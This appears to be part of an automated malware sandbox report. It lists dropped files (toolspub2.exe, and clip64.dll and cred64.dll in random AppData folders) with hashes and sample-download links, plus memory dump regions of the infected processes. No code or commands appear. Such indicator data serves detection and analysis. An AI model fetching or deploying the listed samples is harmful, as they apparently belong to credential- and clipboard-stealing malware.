c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

SHA512
2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9540.tmp
Filesize
28KB

MD5
f69f5371b3af677c471abc6b8a9e8cf4

SHA1
091477d47bee4042486b89a089bf2843cda95695

SHA256
32d027b2d89b256b5c8d76bdb212ef9cc6af535cd49963941b60668d9608fd4b

SHA512
47e42267e01f2c2d3a0a1656f376bfd42fd3dc27e003f57fb5e56be5eee543d340a7ed8b4235b9ac847b962dcc6c89153dfea29d5269f88fef952dc96fae1dff

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9561.tmp
Filesize
116KB

MD5
ef43c399ca3ed56fb84f62f5c0dc332a

SHA1
db7375857a4126115ddc8c3cbaa5d404742fe122

SHA256
a8dc08381bd9b1f2b8930676f1b3d923bbbbfd8538a2f5884256a6a8b7220c17

SHA512
492974094044357d3b03d18f45d961e6051d8ac56b9f2e84e0ce7a31238407212844c013646de4033da0b27d7d68b43c76d897fa44177da817568923097fb7ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp957C.tmp
Filesize
96KB

MD5
d367ddfda80fdcf578726bc3b0bc3e3c

SHA1
23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

SHA256
0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

SHA512
40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

Download Submit
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
Filesize
239KB

MD5
cbc7a8ce71264b2c2c8568fd6ff6d93d

SHA1
16e53a3a1789b42dce33e1fb9d5b6476cc76dcf5

SHA256
10b9e6d04ea861b41718bc6ec5822e33500c7008c9f00c8c75d429d340068fc0

SHA512
c1a7040de751719d8dc335cca8d7c34411898d5b0c321668abdd059862dd566b4b58bdb9f997407d09dd7f7fb3a21a5061b4c1e4e45b57e7dccde6a7cc29759e

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
Filesize
89KB

MD5
e913b0d252d36f7c9b71268df4f634fb

SHA1
5ac70d8793712bcd8ede477071146bbb42d3f018

SHA256
4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da

SHA512
3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4

Download Submit
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
Filesize
273B

MD5
a5b509a3fb95cc3c8d89cd39fc2a30fb

SHA1
5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c

SHA256
5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529

SHA512
3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

Download Submit
C:\Users\Admin\AppData\Roaming\aca439ae61e801\clip64.dll
Filesize
102KB

MD5
8da053f9830880089891b615436ae761

SHA1
47d5ed85d9522a08d5df606a8d3c45cb7ddd01f4

SHA256
d5482b48563a2f1774b473862fbd2a1e5033b4c262eee107ef64588e47e1c374

SHA512
69d49817607eced2a16a640eaac5d124aa10f9eeee49c30777c0bc18c9001cd6537c5b675f3a8b40d07e76ec2a0a96e16d1273bfebdce1bf20f80fbd68721b39

Download Submit
C:\Users\Admin\AppData\Roaming\aca439ae61e801\cred64.dll
Filesize
1.2MB

MD5
0111e5a2a49918b9c34cbfbf6380f3f3

SHA1
81fc519232c0286f5319b35078ac3bb381311bd4

SHA256
4643d18bb8be79c2e3178bc3978d201c596ab70a347e8cf1e8fdbe3028d69d7c

SHA512
a2aac32a2c5146dd7287d245bfa9424287bfd12a40825f4da7d18204837242c99d4406428f2361e13c2e4f4d68c385de12e98243cf48bf4c6c5a82273c4467a5

Download Submit
\??\pipe\LOCAL\crashpad_1112_RGJNGVFNHCEFAFAL
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_1312_HRHANBGBNGHTINTM
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_3104_LLETJGJBRLNVMPXQ
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\LOCAL\crashpad_4164_CILAEBZLVVZEJXUF
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/236-369-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/236-94-0x0000000007F90000-0x0000000007FDC000-memory.dmp

Filesize
304KB

Download
memory/236-80-0x0000000007D10000-0x0000000007D1A000-memory.dmp

Filesize
40KB

Download
memory/236-76-0x0000000007DA0000-0x0000000007DB0000-memory.dmp

Filesize
64KB

Download
memory/236-89-0x0000000007EF0000-0x0000000007F02000-memory.dmp

Filesize
72KB

Download
memory/236-71-0x0000000007C20000-0x0000000007CB2000-memory.dmp

Filesize
584KB

Download
memory/236-92-0x0000000007F50000-0x0000000007F8C000-memory.dmp

Filesize
240KB

Download
memory/236-63-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/236-67-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/236-70-0x00000000080F0000-0x0000000008694000-memory.dmp

Filesize
5.6MB

Download
memory/236-88-0x00000000086A0000-0x00000000087AA000-memory.dmp

Filesize
1.0MB

Download
memory/236-386-0x0000000007DA0000-0x0000000007DB0000-memory.dmp

Filesize
64KB

Download
memory/236-86-0x0000000008CC0000-0x00000000092D8000-memory.dmp

Filesize
6.1MB

Download
memory/388-2275-0x00007FF68E9F0000-0x00007FF68EF91000-memory.dmp

Filesize
5.6MB

Download
memory/568-1588-0x0000000000400000-0x00000000007CA000-memory.dmp

Filesize
3.8MB

Download
memory/568-1589-0x0000000000400000-0x00000000007CA000-memory.dmp

Filesize
3.8MB

Download
memory/568-1591-0x0000000000400000-0x00000000007CA000-memory.dmp

Filesize
3.8MB

Download
memory/2772-57-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/2772-55-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3100-49-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/3100-47-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/3100-48-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/3100-54-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/3252-1244-0x0000000003440000-0x0000000003456000-memory.dmp

Filesize
88KB

Download
memory/3252-56-0x0000000003020000-0x0000000003036000-memory.dmp

Filesize
88KB

Download
memory/4676-42-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/4676-46-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/4676-93-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/4676-118-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/4828-650-0x0000000007EB0000-0x0000000007EC0000-memory.dmp

Filesize
64KB

Download
memory/4828-829-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/4828-918-0x0000000007EB0000-0x0000000007EC0000-memory.dmp

Filesize
64KB

Download
memory/4828-645-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/4828-646-0x0000000000F50000-0x0000000000F8C000-memory.dmp

Filesize
240KB

Download
memory/4880-1220-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/4880-948-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/4880-1057-0x00000000001D0000-0x0000000000E60000-memory.dmp

Filesize
12.6MB

Download
memory/5092-1210-0x00007FF907E30000-0x00007FF9088F1000-memory.dmp

Filesize
10.8MB

Download
memory/5092-1211-0x00000000028A0000-0x00000000028B0000-memory.dmp

Filesize
64KB

Download
memory/5092-1382-0x00007FF907E30000-0x00007FF9088F1000-memory.dmp

Filesize
10.8MB

Download
memory/5092-1203-0x0000000000810000-0x0000000000818000-memory.dmp

Filesize
32KB

Download
memory/5632-1906-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/5632-1321-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/5632-1285-0x0000000002E10000-0x00000000036FB000-memory.dmp

Filesize
8.9MB

Download
memory/5632-1625-0x0000000002E10000-0x00000000036FB000-memory.dmp

Filesize
8.9MB

Download
memory/5632-1283-0x0000000002A00000-0x0000000002E07000-memory.dmp

Filesize
4.0MB

Download
memory/5632-1645-0x0000000002A00000-0x0000000002E07000-memory.dmp

Filesize
4.0MB

Download
memory/5784-1245-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/5784-1233-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/6344-648-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/6344-837-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/6344-653-0x0000000007750000-0x0000000007760000-memory.dmp

Filesize
64KB

Download
memory/6344-649-0x0000000000720000-0x000000000075C000-memory.dmp

Filesize
240KB

Download
memory/6696-2276-0x0000000001930000-0x0000000001950000-memory.dmp

Filesize
128KB

Download
memory/6732-637-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/6732-641-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/6732-643-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/6732-638-0x0000000000400000-0x0000000000433000-memory.dmp

Filesize
204KB

Download
memory/7196-1495-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/7196-1213-0x0000000000400000-0x0000000000461000-memory.dmp

Filesize
388KB

Download
memory/7196-1212-0x00000000005D0000-0x000000000060E000-memory.dmp

Filesize
248KB

Download
memory/7196-1224-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/7196-1430-0x00000000049F0000-0x0000000004A51000-memory.dmp

Filesize
388KB

Download
memory/7544-1531-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

Filesize
4KB

Download
memory/7544-1928-0x0000000000400000-0x0000000000965000-memory.dmp

Filesize
5.4MB

Download
memory/7544-1204-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

Filesize
4KB

Download
memory/7764-1594-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/7764-1223-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/7764-1225-0x0000000004850000-0x0000000004860000-memory.dmp

Filesize
64KB

Download
memory/7764-1626-0x0000000004850000-0x0000000004860000-memory.dmp

Filesize
64KB

Download
memory/7764-1222-0x0000000000030000-0x000000000004E000-memory.dmp

Filesize
120KB

Download
memory/7780-1235-0x0000000000810000-0x0000000000819000-memory.dmp

Filesize
36KB

Download
memory/7780-1234-0x000000000089D000-0x00000000008B0000-memory.dmp

Filesize
76KB

Download
memory/7880-2237-0x0000000000400000-0x00000000008DF000-memory.dmp

Filesize
4.9MB

Download
memory/8104-2111-0x0000000000400000-0x0000000000D1B000-memory.dmp

Filesize
9.1MB

Download
memory/8132-1939-0x00007FF717730000-0x00007FF717CD1000-memory.dmp

Filesize
5.6MB

Download
memory/8132-1995-0x00007FF717730000-0x00007FF717CD1000-memory.dmp

Filesize
5.6MB

Download
memory/8132-1929-0x00007FF717730000-0x00007FF717CD1000-memory.dmp

Filesize
5.6MB

Download
memory/8180-1108-0x00000000005E0000-0x000000000063A000-memory.dmp

Filesize
360KB

Download
memory/8180-1221-0x0000000008110000-0x0000000008176000-memory.dmp

Filesize
408KB

Download
memory/8180-1627-0x0000000004A50000-0x0000000004AA0000-memory.dmp

Filesize
320KB

Download
memory/8180-1628-0x0000000004AA0000-0x0000000004B16000-memory.dmp

Filesize
472KB

Download
memory/8180-1102-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/8180-1524-0x0000000007670000-0x0000000007680000-memory.dmp

Filesize
64KB

Download
memory/8180-1128-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/8180-1435-0x0000000074340000-0x0000000074AF0000-memory.dmp

Filesize
7.7MB

Download
memory/8180-1379-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/8180-1188-0x0000000007670000-0x0000000007680000-memory.dmp

Filesize
64KB

Download
memory/8180-1637-0x0000000004B20000-0x0000000004B3E000-memory.dmp

Filesize
120KB

Download
memory/8240-1378-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/8532-1439-0x0000000000730000-0x0000000000731000-memory.dmp

Filesize
4KB

Download
memory/8616-1611-0x0000000000400000-0x00000000007CA000-memory.dmp

Filesize
3.8MB

Download